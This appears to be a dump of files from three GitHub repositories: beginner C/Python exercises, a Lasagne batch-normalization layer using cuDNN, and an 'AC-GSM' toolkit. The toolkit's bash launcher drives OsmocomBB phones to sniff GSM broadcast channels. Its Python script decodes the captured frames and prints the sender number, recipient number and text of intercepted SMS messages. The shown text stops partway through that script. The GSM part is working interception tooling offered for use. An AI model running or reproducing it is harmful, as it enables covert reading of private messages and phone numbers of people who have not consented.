"max_line_length": 23,
"num_lines": 6,
"path": "/prog23.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "string=input()\na=list(string)\nadd=0\nfor i in range(len(a)):\n add=add+ord(a[i])\nprint(add)\n"
},
{
"alpha_fraction": 0.2586604952812195,
"alphanum_fraction": 0.2909930646419525,
"avg_line_length": 15.65384578704834,
"blob_id": "686a50eddcb0a4b2ab7d7c7d26efb971fc6e5a32",
"content_id": "03723925c4ed262b12b88a00eef8c1908f2af601",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 433,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 26,
"path": "/prog44.c",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "#include<stdio.h>\nvoid main()\n{\n int i,j,a[10],b;\n for(i=0;i<10;i++)\n {\n scanf(\"%d\",&a[i]);\n }\n for(i=0;i<10;i++)\n {\n for(j=i+1;j<10;j++)\n {\n if (a[i]>=a[j])\n {\n b=a[i];\n a[i]=a[j];\n a[j]=b;\n }\n }\n }\n printf(\"\\nThe ascending order :\\n\");\n for(i=0;i<10;i++)\n {\n printf(\"%d\\n\",a[i]);\n }\n}\n"
},
{
"alpha_fraction": 0.5318182110786438,
"alphanum_fraction": 0.5363636612892151,
"avg_line_length": 21,
"blob_id": "caf86b9873a7db95cc63f41a4b09fa4fe15f22aa",
"content_id": "c18027a4f2288ee89f55efa4a44bc57d071e9b08",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 220,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 10,
"path": "/prog14.c",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "#include<stdio.h>\nint main()\n{\n int x,y,z,greater;\n printf(\"Enter three numbers :\");\n scanf(\"%d %d %d\",&x,&y,&z);\n greater=(x>y && x>z)?x:(y>z)?y:z;\n printf(\"Greatest number :%d\",greater);\n return 0;\n}\n"
},
{
"alpha_fraction": 0.49504950642585754,
"alphanum_fraction": 0.5247524976730347,
"avg_line_length": 32.66666793823242,
"blob_id": "63c9cb387bff4eb6fa47a6d424fbe2d1aa589abb",
"content_id": "661e2d5897ce580f5b8e186282d7b34f3029f36c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 101,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 3,
"path": "/prog13.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "num = int(input(\"Enter the number :\"))\nfor i in range(1,11):\n print(\"\\n\",i,\" * \",num,\" = \",i*num)\n"
},
{
"alpha_fraction": 0.40909090638160706,
"alphanum_fraction": 0.5909090638160706,
"avg_line_length": 6.333333492279053,
"blob_id": "c39d5cf6fda6f06e7591ba4e17e5315e264e8879",
"content_id": "2b9470d8a0de5123fcacc2498121a36f13c88271",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22,
"license_type": "no_license",
"max_line_length": 10,
"num_lines": 3,
"path": "/prog1.py",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "a=40 \nb=80\nprint(a+b)\n"
},
{
"alpha_fraction": 0.48571428656578064,
"alphanum_fraction": 0.5035714507102966,
"avg_line_length": 16.5,
"blob_id": "56c946387add38ad1d2b23ee5037c34e0dc22548",
"content_id": "480ad77858e854ca9508e00a60e2f16ee784f3d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 280,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 16,
"path": "/prog23.c",
"repo_name": "gurusarishkumar-it19/myprograms",
"src_encoding": "UTF-8",
"text": "#include<stdio.h>\n#include<string.h>\nvoid main()\n{\n char str[100];\n int a,i,sum=0;\n printf(\"Enter the string :\");\n scanf(\"%s\",&str);\n a=strlen(str);\n for (i=0;i<a;i++)\n {\n sum=sum+str[i];\n }\n printf(\"\\n Sum of hte ascii values = %d\",sum);\n \n}\n"
}
] | 29 |
jureso/BatchNormalizationCUDNN
|
https://github.com/jureso/BatchNormalizationCUDNN
|
5abdaec4bc2ecb6ade72150a53a21001c592946e
|
ca26b39e6db489c47de986dfbed62de27192d936
|
ca045be2119dbe83fae454d7cdb9c8875c9df65f
|
refs/heads/master
| 2021-01-11T00:07:41.218282 | 2016-10-13T00:00:12 | 2016-10-13T00:00:12 | 70,751,488 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.629948616027832,
"alphanum_fraction": 0.6359216570854187,
"avg_line_length": 48.30821990966797,
"blob_id": "0bf098802119e7a408826255ec35a58dc14d5351",
"content_id": "a34eba3578c12470b5d126b1ed13d3d2b4c70b7d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7199,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 146,
"path": "/batchnormalization.py",
"repo_name": "jureso/BatchNormalizationCUDNN",
"src_encoding": "UTF-8",
"text": "import theano\nimport theano.tensor as T\nimport lasagne\nfrom lasagne.layers.base import Layer\nfrom lasagne import init\nfrom theano.sandbox.cuda.dnn import dnn_batch_normalization_train, dnn_batch_normalization_test\n\nclass BatchNormLayer(Layer):\n \"\"\"\n batchnormalization.BatchNormLayer(self, incoming, axes='auto', epsilon=1e-4, alpha=0.1,\n beta=init.Constant(0), gamma=init.Constant(1), mean=init.Constant(0), inv_std=init.Constant(1),\n var=init.Constant(1), cudnn = True, beta_trainable=True, gamma_trainable=True, **kwargs)\n\n Batch Normalization implementation using CUDNN\n\n This layer implements batch normalization using CUDNNv5 implementation. of its inputs, following [1]_:\n\n Parameters\n ----------\n incoming : a :class:`Layer` instance or a tuple\n The layer feeding into this layer, or the expected input shape\n axes : 'auto', int or tuple of int\n The axis or axes to normalize over. If ``'auto'`` (the default),\n normalize over all axes except for the second: this will normalize over\n the minibatch dimension for dense layers, and additionally over all\n spatial dimensions for convolutional layers.\n epsilon : scalar\n Small constant :math:`\\\\epsilon` added to the variance before taking\n the square root and dividing by it, to avoid numerical problems\n alpha : scalar\n Coefficient for the exponential moving average of batch-wise means and\n standard deviations computed during training; the closer to one, the\n more it will depend on the last batches seen\n beta : Theano shared variable, expression, numpy array, callable or None\n Initial value, expression or initializer for :math:`\\\\beta`. Must match\n the incoming shape, skipping all axes in `axes`. Set to ``None`` to fix\n it to 0.0 instead of learning it.\n See :func:`lasagne.utils.create_param` for more information.\n gamma : Theano shared variable, expression, numpy array, callable or None\n Initial value, expression or initializer for :math:`\\\\gamma`. Must\n match the incoming shape, skipping all axes in `axes`. Set to ``None``\n to fix it to 1.0 instead of learning it.\n See :func:`lasagne.utils.create_param` for more information.\n mean : Theano shared variable, expression, numpy array, or callable\n Initial value, expression or initializer for :math:`\\\\mu`. Must match\n the incoming shape, skipping all axes in `axes`.\n See :func:`lasagne.utils.create_param` for more information.\n inv_std : Theano shared variable, expression, numpy array, or callable\n Initial value, expression or initializer for :math:`1 / \\\\sqrt{\n \\\\sigma^2 + \\\\epsilon}`. Must match the incoming shape, skipping all\n axes in `axes`.\n See :func:`lasagne.utils.create_param` for more information.\n var : Theano shared variable, expression, numpy array, or callable\n Initial value, expression or initializer for :math:`\\\\sigma^2 `.\n Must match the incoming shape, skipping all axes in `axes`.\n cudnn : boolean\n Determines if we us CUDNN implementation or internal theano implementation\n beta_trainable : boolean\n Determines if parameter beta is fixed during training or if it is updated.\n gamma_trainable : boolean\n Determines if parameter gamma is fixed during training or if it is updated.\n **kwargs\n Any additional keyword arguments are passed to the :class:`Layer`\n superclass.\n Notes\n -----\n In large graphs (e.g. ResNets) the compilation using cudnn=True is significantly faster than using cudnn=False.\n\n See also\n --------\n lasagne.layers.BatchNormLayer\n \"\"\"\n\n def __init__(self, incoming, axes='auto', epsilon=1e-4, alpha=0.1,\n beta=init.Constant(0), gamma=init.Constant(1),\n mean=init.Constant(0), inv_std=init.Constant(1), var=init.Constant(1),\n cudnn = True, beta_trainable=True, gamma_trainable=True, **kwargs):\n super(BatchNormLayer, self).__init__(incoming, **kwargs)\n\n assert len(self.input_shape) == 4, \"Current implementation only supports 4D tensors! Input shape: \" + str(self.input_shape)\n assert axes == 'auto', \"Current implementation only support axes='auto'!\"\n\n if axes == 'auto':\n # default: normalize over all but the second axis\n axes = (0,) + tuple(range(2, len(self.input_shape)))\n elif isinstance(axes, int):\n axes = (axes,)\n\n self.axes = axes\n self.epsilon = epsilon\n self.alpha = alpha\n self.cudnn = cudnn\n\n # we manually determine the shape of all parameters (cudnn requires such shapes)\n shape = (1,self.input_shape[1],1,1)\n\n if beta is None:\n self.beta = None\n else:\n self.beta = self.add_param(beta, shape, 'beta',\n trainable=beta_trainable, regularizable=False)\n if gamma is None:\n self.gamma = None\n else:\n self.gamma = self.add_param(gamma, shape, 'gamma',\n trainable=gamma_trainable, regularizable=gamma_trainable)\n\n self.mean = self.add_param(mean, shape, 'mean',\n trainable=False, regularizable=False)\n self.inv_std = self.add_param(inv_std, shape, 'inv_std',\n trainable=False, regularizable=False)\n self.var = self.add_param(var, shape, 'var',\n trainable=False, regularizable=False)\n\n def get_output_for(self, input, deterministic=False, **kwargs):\n\n\n if deterministic is False:\n if self.cudnn:\n out, input_mean, input_inv_std = dnn_batch_normalization_train(input, self.gamma, self.beta, mode='spatial',epsilon=self.epsilon)\n else: # we simulate cudnn BN\n axes = self.axes\n\n input_mean = input.mean(axes, keepdims=True)\n input_var = input.var(axes, keepdims=True)\n input_inv_std = T.inv(T.sqrt(input_var + self.epsilon))\n out = (input - input_mean) * self.gamma * input_inv_std + self.beta\n\n var = input_inv_std ** (-2) - self.epsilon\n\n running_mean = theano.clone(self.mean, share_inputs=False)\n running_inv_std = theano.clone(self.inv_std, share_inputs=False)\n running_var = theano.clone(self.var, share_inputs=False)\n\n running_mean.default_update = ((1 - self.alpha) * running_mean + self.alpha * input_mean)\n running_inv_std.default_update = ((1 - self.alpha) * running_inv_std + self.alpha * input_inv_std)\n running_var.default_update = ((1 - self.alpha) * running_var + self.alpha * var)\n\n out += (0 * running_mean + 0 * running_inv_std + 0 * running_var)\n\n else:\n if self.cudnn:\n out = dnn_batch_normalization_test(input, self.gamma, self.beta, self.mean, self.var, mode='spatial', epsilon=self.epsilon)\n else:\n out = (input - self.mean) * self.gamma * T.sqrt((self.var + self.epsilon))**(-1) + self.beta\n return out\n"
},
{
"alpha_fraction": 0.6288071274757385,
"alphanum_fraction": 0.6656091213226318,
"avg_line_length": 31.83333396911621,
"blob_id": "addfc7cb1794839acbeac86d1960ea3b89dabe0f",
"content_id": "43b4786fc237ef524ebef685023e7043e38592e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1576,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 48,
"path": "/test_batchnormalization.py",
"repo_name": "jureso/BatchNormalizationCUDNN",
"src_encoding": "UTF-8",
"text": "import theano\nimport theano.tensor as T\nimport lasagne\nimport numpy as np\n\ndef simple_network(input_var, use_cudnn = True):\n from lasagne.layers.dnn import Conv2DDNNLayer as ConvLayer\n from batchnormalization import BatchNormLayer\n\n l_in = lasagne.layers.InputLayer(shape=(None, 3, 32, 32), input_var=input_var)\n l_conv1 = ConvLayer(l_in, num_filters=16, filter_size=(3, 3), stride=(1, 1), nonlinearity=None,\n pad='same',\n W=lasagne.init.HeNormal(gain='relu'), flip_filters=False, b=None)\n\n l_bn1 = BatchNormLayer(l_conv1, cudnn=use_cudnn)\n l_relu = lasagne.layers.NonlinearityLayer(l_bn1, nonlinearity=lasagne.nonlinearities.rectify)\n return l_relu\n\ndef test_batchnormalization_forward():\n input_var = T.tensor4('inputs')\n\n network = simple_network(input_var)\n\n output = lasagne.layers.get_output(network)\n\n fn = theano.function([input_var], output)\n\n Xin = np.random.randn(100,3,32,32).astype(np.float32)\n Xout = fn(Xin)\n assert Xout.shape == (100,16,32,32)\n\n\ndef test_batchnormalization_backward():\n input_var = T.tensor4('inputs')\n\n network = simple_network(input_var)\n\n output = lasagne.layers.get_output(network)\n\n loss = T.sum(output**2)\n params = lasagne.layers.get_all_params(network, trainable=True)\n updates = lasagne.updates.sgd(loss, params, 1)\n\n fn = theano.function([input_var], output, updates=updates)\n\n Xin = np.random.randn(100,3,32,32).astype(np.float32)\n Xout = fn(Xin)\n assert Xout.shape == (100,16,32,32)\n"
},
{
"alpha_fraction": 0.6991150379180908,
"alphanum_fraction": 0.7179203629493713,
"avg_line_length": 38.30434799194336,
"blob_id": "fa075507d4562fabf8d3ab4c99e6afe348e06646",
"content_id": "3465ceddacab69b6f665b54677db4a6139214151",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 904,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 23,
"path": "/README.md",
"repo_name": "jureso/BatchNormalizationCUDNN",
"src_encoding": "UTF-8",
"text": "# Batch Normalization using CUDNN in Lasagne\n\nThis module reimplements Lasagne version of \n[Batch normalization](http://lasagne.readthedocs.io/en/latest/modules/layers/normalization.html#lasagne.layers.BatchNormLayer) \nso that it uses the CUDNNv5 implementation.\n \nSee **batchnormalization.py** for details.\n\n## Usage\n\n```python\nimport lasagne\nfrom lasagne.layers.dnn import Conv2DDNNLayer as ConvLayer\nfrom batchnormalization import BatchNormLayer\n\nl_in = lasagne.layers.InputLayer(shape=(None, 3, 32, 32), input_var=input_var)\nl_conv1 = ConvLayer(l_in, num_filters=16, filter_size=(3, 3), stride=(1, 1), nonlinearity=None,\n pad='same',\n W=lasagne.init.HeNormal(gain='relu'), flip_filters=False, b=None)\n\nl_bn1 = BatchNormLayer(l_conv1)\nl_relu = lasagne.layers.NonlinearityLayer(l_bn1, nonlinearity=lasagne.nonlinearities.rectify)\n```\n"
}
] | 3 |
hngbyr/gsm
|
https://github.com/hngbyr/gsm
|
5d2cf3353fe605a9b0155066a5d93a63a0bbc4ed
|
cb76232f78a596338191ebb1045e80d50e28a4a5
|
89281e284351465fa9d08cc27fc42c380d21ca7e
|
refs/heads/master
| 2020-12-24T15:58:35.017390 | 2015-04-06T16:47:38 | 2015-04-06T16:47:38 | 33,492,564 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5856188535690308,
"alphanum_fraction": 0.6072432994842529,
"avg_line_length": 35.93506622314453,
"blob_id": "3c9585c6d54b5e5a02dd1576399ad975ebd21bb2",
"content_id": "378f7d9f8c5a5a199427cd2632e1d6ce066045c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 6208,
"license_type": "no_license",
"max_line_length": 227,
"num_lines": 154,
"path": "/bin/gsm.sh",
"repo_name": "hngbyr/gsm",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\nCONFIG=\"$HOME/.ini/config.ini\";\nif [ ! -f $CONFIG ];then\nzenity --info --text=\"错误代码0x05\" --title=\"配置文件错误\";\n echo \"error code 0x05,Please contact the system administrator!\";\n exit 1;\nfi\nGSMPATH=`cat \"$CONFIG\" | grep '^GSMPATH=' | cut -d '=' -f 2`;\nGSMAPPATH=`cat \"$CONFIG\" | grep '^GSMAPATH=' | cut -d '=' -f 2`;\nGSMNUM=`cat \"$CONFIG\" | grep '^GSMNUM=' | cut -d '=' -f 2`;\nMOBILE=`cat \"$CONFIG\" | grep '^MOBILE=' | cut -d '=' -f 2`;\nGSMDEFSESSION=`cat \"$CONFIG\" | grep '^GSMDEFSESSION=' | cut -d '=' -f 2`;\nGSMSESSION=`cat \"$CONFIG\" | grep '^GSMSESSION=' | cut -d '=' -f 2`;\nGSMBRMBORACTL=`cat \"$CONFIG\" | grep '^GSMBRMBORACTL=' | cut -d '=' -f 2`;\nnetwork_name=`cat \"$CONFIG\" | grep '^GSMLOCALHOST=' | cut -d '=' -f 2`;\nGSMKRAKENHOST=`cat \"$CONFIG\" | grep '^GSMKRAKENHOST=' | cut -d '=' -f 2`;\nGSMNAPALMEXCOCODE=`cat \"$CONFIG\" | grep '^GSMNAPALMEXCOCODE=' | cut -d '=' -f 2`;\nphone=`cat \"$CONFIG\" | grep '^MOBILE=' | cut -d '=' -f 2`;\nGSMPACHER=`cat \"$CONFIG\" | wc -l`;\nnum=`lsusb |grep FT232 | wc -l`;\n# 检查配置文件\nif [ \"$num\" = \"0\" ];then\n\tzenity --warning --text=\"没有发现硬件[Error code:0x0e]\" --title=\"AC-GSM 0x0e\" --ok-label=\"退出\";\nexit\nfi\nif [ \"$GSMNAPALMEXCOCODE\" -ne \"$GSMPACHER\" ];then\n\tzenity --error --text=\"非注册用户(error code 0x0f)\" --title=\"请注册\" --ok-label=\"关闭\";\n\techo \"error code 0x0f\";\n\texit 1;\nfi\nif [ -z \"$GSMBRMBORACTL\" ]; then\n\tif [ $num -le 3 ];then ##lt< le<= eg=\n\tGSMNUM=$num;\n\telse\n\tGSMNUM=3;\n\tfi\nfi\n\n\nif [ ! -d $GSMSESSION ];then\n\tmkdir -p $GSMSESSION ;\nfi\nsudo=\"\"\n# 检查是否是root用户执行 \nif [ $(id -u) != \"0\" ]; then\n#zenity --error --text=\"非ROOT用户:[Error code:0x00]\" --title=\"非ROOT用户\" --ok-label=\"退出\";\n# echo -e \"Error code 0x00: Run this script using the root user!\\nUsage:sudo bash $0\";\n# exit 1;\nsudo=\"sudo\";\nfi\n# 清理运行环境\nkillall ccch_scan cell_log osmocon 2>/dev/null;\ncd $GSMSESSION && rm -rf *.dat;\n\n#echo $GSMAPPATH\n#sleep 5\n# 检查osmocombb程序\nif [ ! -f $GSMAPPATH/osmocon ];then\n\tzenity --error --text=\"错误代码[Error code:0x01]\" --title=\"AC-GSM 程序错误\" --ok-label=\"退出\";\n\techo \"error code 0x01,Please contact the system administrator!\";\n exit 1\nelif [ ! -f $GSMAPPATH/layer1.compalram.bin ];then\n\tzenity --error --text=\"错误代码[Error code:0x02]\" --title=\"AC-GSM 程序错误\" --ok-label=\"退出\";\n echo \"error code 0x02,Please contact the system administrator!\";\n exit 1;\nelif [ ! -f $GSMAPPATH/cell_log ];then\n\tzenity --error --text=\"错误代码[Error code:0x03]\" --title=\"AC-GSM 程序错误\" --ok-label=\"退出\";\n echo \"error code 0x03,Please contact the system administrator!\";\n exit 1;\nelif [ ! -f $GSMAPPATH/ccch_scan ];then\n\tzenity --error --text=\"错误代码[Error code:0x04]\" --title=\"AC-GSM 程序错误\" --ok-label=\"退出\";\n echo \"error code 0x04,Please contact the system administrator!\";\n exit 1\nfi\necho \n#echo 程序路径为:$GSMAPPATH\n\necho \"[-]你是[ $GSMNUM ]信道用户,检测到通道数量:[ $num ] \";\necho \"[-]你是[ $GSMNUM ]信道用户!\";\ni=0\necho\nCell_log()\n{\n#\techo \"DBG: $GSMAPPATH/cell_log -s /tmp/osmocom_l2_$i -l - 2>&1 | bash $GSMPATH/cell_log.sh $cell_num | tee \"$GSMSESSION\"/scan.current\";\n\t$sudo $GSMAPPATH/cell_log -s /tmp/osmocom_l2_$i -l - 2>&1 | bash $GSMPATH/cell_log.sh $cell_num | tee \"$GSMSESSION\"/scan.current\necho \"PID: $$\"\n}\n\nwhile [ $i -lt $GSMNUM ];do\n\tserial=\"/dev/ttyUSB$i\";\n\techo \"[*]开始对第【$((i+1))/$GSMNUM 】信道启动和设置------------\";\n\techo \"[*]加载信道【$((i+1)) 】固件,打开电源按红色按钮...\";\n#\techo \"DBG: $GSMPATH/motoload.sh $phone $serial /tmp/osmocom_l2_$i /tmp/osmocom_loader_$i\";\n\t$sudo $GSMPATH/motoload.sh $phone $serial /tmp/osmocom_l2_$i /tmp/osmocom_loader_$i > /tmp/log_l1_$$_$i 2>&1 &\n\techo \"PID: $$\"\n#\txterm -T \"AC-GSM Channel [ $((i+1)) ] Data Windows\" -e \"$GSMAPPATH\"/osmocon -m c123xor -s \"$GSMDEFSESSION\"/osmocom_l2_$((i+1)) -l \"$GSMDEFSESSION\"/osmocom_loader_$((i+1)) -p /dev/ttyUSB\"$i\" \"$GSMAPPATH\"/layer1.compalram.bin &\n\tifconfig $network_name:$((i+1)) down 2>/dev/null\n\tifconfig $network_name:$((i+1)) $GSMKRAKENHOST$((i+1))\n\tif [ \"$i\" -eq 0 ]; then # backwards compatibility\n\t\trm -f /tmp/osmocom_l2;\n\t\tln -s /tmp/osmocom_l2_0 /tmp/osmocom_l2;\n\t\trm -f /tmp/osmocom_loader;\n\t\tln -s /tmp/osmocom_loader_0 /tmp/osmocom_loader;\n\tfi\n\tread -p \"[*]信道启动完成?(Y/N)\";\n\tif [ -z $arfcn_num ] ;then\n\t\tread -p \"[!]是否需要扫描频段Arfcn[默认回车:是]:\" abc\n\t\tif [ -z $abc ];then\n\t\t\tif [ -z $arfcn_num ];then\n\t\t\tread -p \"[!]输入扫描频段显示数量[默认回车:all]:\" cell_num;\n\t\t\t\tif [ X\"$cell_num\" == X\"\" ];then\n\t\t\t\tcell_numl=\"\"\n\t\t\t\tfi\n\t\t\tfi\n\t\tCell_log\n\t\tfi\n\tfi\n#\t\txterm -T \"AC-GSM Channel [ $((i+1)) ] Cell Windows\" -e $GSMAPPATH/cell_log -s $GSMDEFSESSION/osmocom_l2_$((i+1)) 2>/dev/null &\n\t#sleep 1;\n#\tif [ ! -z \"${array[@]:0}\" ] ;then\n#\techo \"已经扫描的频段ARFCN: ${array[@]:0} \"\n#\tfi\n\tread -p \"[*]请输入频段ARFCN:\" arfcn_num;\n#echo `stty -F /dev/ttyUSB0`\n\techo -e '\\n';\n\tarray[i]=\"$arfcn_num \";\n#echo \"DBG:xterm -T \"AC-GSM Channel [ $((i+1)) ] Scan Windows\" -e \"$GSMAPPATH\"/ccch_scan -s \"$GSMDEFSESSION\"/osmocom_l2_$i -i \"$GSMKRAKENHOST\"\"$((i+1))\" -a \"$arfcn_num\" \"\n\t$sudo xterm -T \"AC-GSM Channel [ $((i+1)) ] Scan Windows\" -e \"$GSMAPPATH\"/ccch_scan -s \"$GSMDEFSESSION\"/osmocom_l2_$i -i \"$GSMKRAKENHOST\"\"$((i+1))\" -a \"$arfcn_num\" &\n\ti=$((i+1));\n#echo `stty -F /dev/ttyUSB0`\nsleep 1\narfcn_num=\"\"\ndone\nread -p \"[!]是否窗口显示[默认回车:是]:\" YN\n\tif [ X\"$YN\" == X\"\" ];then\n\tsudo $GSMPATH/wireshark.sh &\n\tfi\nclear\n#time=`echo `date +%Y/%m/%d` `date +%H:%M``;\nLOGFILE=`date +%m%d%H%M`;\n\necho \"........................................\";\n#echo 程序路径为:$GSMAPPATH\necho \"[+]信道数量:$GSMNUM\";\necho [*]开始时间:`date +%Y/%m/%d` `date +%H:%M`;\n#echo \"[*]开始时间:$time\";\necho \"[*]ARFCN : ${array[@]:0}\";\necho \"[-]Press 'Ctrl+C' 关闭全部程序!.\";\necho \"[*]收到的信息稍后会显示在下面,并有铃声提醒.\";\necho \"........................................\";\n$sudo bash \"$GSMPATH\"/show.sh | tee \"$GSMAPPATH\"/\"$LOGFILE\".current;\nrm -rf $GSMDEFSESSION/osmocom* $GSMSESSION;\n#sudo $GSMPATH/wireshark.sh\nread IGNORE\n"
},
{
"alpha_fraction": 0.35534048080444336,
"alphanum_fraction": 0.3842032551765442,
"avg_line_length": 50.89237594604492,
"blob_id": "960634c0ed9684ec231ff875855c99dc043d4dbc",
"content_id": "19a8cab4a3657cfba35e879e4652e3ed576c657c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11628,
"license_type": "no_license",
"max_line_length": 168,
"num_lines": 223,
"path": "/bin/tshow",
"repo_name": "hngbyr/gsm",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n#coding:utf-8\n#========================================================\n#命令模式显示GSM内容 2015-02-04 12:46:28 \n#使用方法:先把所有信道启动好,然后运行:python smshack.py\n#==========================================================\n\nimport socket\nimport struct\nimport threading\nimport Queue\nimport time\nimport os\n\ndef covert_cellphone_num(num):\n phone_number = []\n for i in num:\n i = ord(i)\n i = (i << 4 & 0xF0) + (i >> 4 & 0x0F)\n phone_number.append(chr(i))\n\n return (\"\".join(phone_number).encode('hex'))[:-1]\n\ndef handle_message(**kargs):\n gsm_sms_segs = \"\"\n while True:\n data = kargs['messages'].get(True)\n if data[0:2] == '\\x02\\x04': #GSM_TAP header Version02 & HeaderLength 16bytes\n\n address_field = struct.unpack('B', data[16:17])[0]\n control_field = struct.unpack('B', data[17:18])[0]\n length_field = struct.unpack('B', data[18:19])[0]\n\n if (address_field >> 2) & 0x1F == 3: # GSM SMS\n if (control_field & 0x01) == 0x00: # frame type == information frame\n # caculate segments data length\n seg_len = (length_field >> 2) & 0x3F\n # if there are more segments\n has_segments = ((length_field >> 1) & 0x01 == 0x1)\n # caculate segments sequence\n# seq = (control_field >> 1) & 0x07\n\n gsm_sms_segs += data[19:19+seg_len]\n\n # reassemble all segments when handling the last packet\n if has_segments == False:\n\n gsm_sms = gsm_sms_segs\n gsm_sms_segs = \"\"\n\n to_number = \"\"\n from_number = \"\"\n to_number_len = 0\n from_number_len = 0\n is_sms_submit = False\n is_sms_deliver = False\n has_tpudhi = False\n has_tpvpf = False\n is_mms = False\n\n if (len(gsm_sms) > 10 and ord(gsm_sms[0:1]) & 0x0F == 0x09) and (ord(gsm_sms[1:2]) == 0x01) and (ord(gsm_sms[2:3]) > 0x10): # SMS Message\n\n#\t\t\t\t\tf_object=open('/home/gsm/bin/sms.t','a') #abc\n try:\n #print gsm_sms.encode('hex') //hoho\n # determinate if this is uplink message aka MS to Network\n is_uplink = (ord(gsm_sms[3:4]) == 0x00)\n #print (\"Type: SUBMIT\" if is_uplink else \"Type: DELIVER\")\n\n if is_uplink:\n to_number_len = struct.unpack('B', gsm_sms[6:7])[0] - 1\n to_number = gsm_sms[8:8+to_number_len]\n to_number = covert_cellphone_num(to_number)\n\n # check if this is SMS-SUBMIT\n sms_submit = struct.unpack('B', gsm_sms[7+to_number_len+2:7+to_number_len+2+1])[0]\n if sms_submit & 0x03 == 0x01:\n is_sms_submit = True\n # check if TP UD includes a extra header\n has_tpudhi = ((struct.unpack('B', gsm_sms[7+to_number_len+2:7+to_number_len+2+1])[0] & 0x40) == 0x40)\n has_tpvpf = ((struct.unpack('B', gsm_sms[7+to_number_len+2:7+to_number_len+2+1])[0] >> 3 & 0x02) == 0x02)\n from_number_len = struct.unpack('B', gsm_sms[8+to_number_len+3:8+to_number_len+3+1])[0]\n from_number_len = (from_number_len / 2) + (from_number_len % 2)\n from_number = gsm_sms[8+to_number_len+3+2:8+to_number_len+3+2+from_number_len]\n from_number = covert_cellphone_num(from_number) \n print '..' * 30\n os.system('mplayer -really-quiet a.wav 2>/tmp/a')\n print \"Time:%s From:%s To:%s\" % (GetCurrentDate(),from_number,to_number)\n else:\n to_number_len = struct.unpack('B', gsm_sms[5:6])[0] - 1\n to_number = gsm_sms[7:7+to_number_len]\n to_number = covert_cellphone_num(to_number)\n # check if this is SMS-DELIVER\n sms_deliver = struct.unpack('B', gsm_sms[7+to_number_len+2:7+to_number_len+2+1])[0]\n if sms_deliver & 0x03 == 0x0:\n is_sms_deliver = True\n # check if TP UD includes a extra header\n has_tpudhi = ((struct.unpack('B', gsm_sms[7+to_number_len+2:7+to_number_len+2+1])[0] & 0x40) == 0x40)\n from_number_len = struct.unpack('B', gsm_sms[7+to_number_len+3:7+to_number_len+3+1])[0]\n from_number_len = (from_number_len / 2) + (from_number_len % 2)\n from_number = gsm_sms[7+to_number_len+3+2:7+to_number_len+3+2+from_number_len]\n from_number = covert_cellphone_num(from_number)\n print '..' * 30\n os.system('mplayer -really-quiet a.wav 2>/tmp/a')\n print \"Time:%s From: %s To:%s\" % (GetCurrentDate(),from_number,to_number)\n if is_sms_deliver:\n try:\n # if there is additional header, skip it\n header_len = 0\n if has_tpudhi:\n header_len = struct.unpack('B', gsm_sms[7+to_number_len+3+2+from_number_len+10:7+to_number_len+3+2+from_number_len+10+1])[0]\n\n mms = struct.unpack('B', gsm_sms[7+to_number_len+3+2+from_number_len+1:7+to_number_len+3+2+from_number_len+1+1])[0]\n if ((mms >> 2) & 0x03) == 0x01:\n is_mms = True\n\n if header_len == 0:\n sms = gsm_sms[7+to_number_len+3+2+from_number_len + 10:]\n else:\n sms = gsm_sms[7+to_number_len+3+2+from_number_len + 10 + header_len + 1:]\n #print sms.encode('hex')\n\n # adjust string from big-endian to little-endian\n #sms_len = (len(sms) / 2)\n #sms = struct.unpack((\">\" + \"H\" * sms_len), sms)\n #sms = struct.pack(\"<\" + (\"H\" * sms_len), *sms)\n #print sms.encode('hex')\n\n #SMS is using utf-16 encode\n if not is_mms:\n #Dlink date\n print 'Msg:' + sms.decode('UTF-16BE')\n \t\t\t\t\t\t\t\t\t\n else:\n print \" MMS message.\" \n except:\n print \" Can't Decode The Message\" \n\t\t\t\t\t\t \n elif is_sms_submit:\n try:\n # if there is additional header, skip it\n header_len = 0\n # looks like uplink sms doesn't have a TP service centre time stamp\n if has_tpudhi:\n header_len = struct.unpack('B', gsm_sms[8+to_number_len+3+2+from_number_len+3:8+to_number_len+3+2+from_number_len+3+1])[0]\n\n mms = struct.unpack('B', gsm_sms[8+to_number_len+3+2+from_number_len+1:8+to_number_len+3+2+from_number_len+1+1])[0]\n if ((mms >> 2) & 0x03) == 0x01:\n is_mms = True\n\n if has_tpvpf:\n if header_len == 0:\n sms = gsm_sms[8+to_number_len+3+2+from_number_len + 3 + 1:]\n else:\n sms = gsm_sms[8+to_number_len+3+2+from_number_len + 3 + header_len + 1 + 1:]\n else:\n if header_len == 0:\n sms = gsm_sms[8+to_number_len+3+2+from_number_len + 3:]\n else:\n sms 